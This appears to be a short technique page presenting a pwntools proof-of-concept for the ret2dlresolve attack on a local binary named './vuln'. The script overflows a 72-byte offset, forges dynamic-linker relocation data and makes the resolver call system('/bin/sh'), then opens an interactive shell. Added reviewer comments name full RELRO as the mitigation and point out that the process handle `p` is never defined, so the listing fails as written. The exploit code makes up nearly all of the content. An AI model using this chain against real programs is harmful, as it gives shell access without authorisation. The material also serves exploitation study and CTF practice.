
ret2dlresolve

Applies when NX and ASLR are enabled, the binary is dynamically linked, and `read` is available through the PLT.

Exploit code

# ret2dlresolve proof-of-concept assembled with pwntools.
#
# Reviewer notes (defensive context):
#   - As the name implies, the technique depends on lazy symbol binding
#     through the dynamic linker. Linking with full RELRO
#     (-Wl,-z,relro,-z,now) binds the GOT at load time and is the usual
#     mitigation for this class of exploit; the page's own preconditions
#     (NX, ASLR, dynamic linking, `read` in the PLT) do not rule it out.
#   - `p` (the target process or connection) is never assigned anywhere in
#     this listing, so as written the script raises NameError at the first
#     `p.sendline` call.
#   - `time` is imported but never used.
from pwn import *
import time

# DEBUG logs every byte sent and received — handy while developing, noisy otherwise.
context.log_level = 'DEBUG'
context(os='linux', arch='amd64')
# Load the target; setting context.binary lets pwntools derive arch/bits from the ELF.
context.binary = elf = ELF('./vuln')
# Libc associated with the binary — assigned but not referenced again in this listing.
glibc = elf.libc
# ROP chain builder over the target binary's own gadgets; no libc addresses
# are used anywhere in this script.
rop = ROP(elf)

# Fake dynamic-linker structures so that the lazy resolver binds the call
# to system("/bin/sh") instead of a legitimate symbol.
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

# Padding up to the saved return address: 64-byte buffer plus 8 bytes for the
# saved rbp, presumably — confirm against the target's actual stack layout.
rop.raw('A' * (64 + 8))
# Stage 1: read(0, data_addr) pulls the dlresolve payload from stdin into a
# writable address chosen by pwntools (dlresolve.data_addr).
rop.read(0, dlresolve.data_addr)
# Stage 2: enter the resolver with the crafted relocation entry.
rop.ret2dlresolve(dlresolve)
# NOTE(review): `p` is undefined here — no process()/remote() precedes these sends.
p.sendline(rop.chain())
# The second line feeds the bytes consumed by the read() call queued above.
p.sendline(dlresolve.payload)

p.interactive()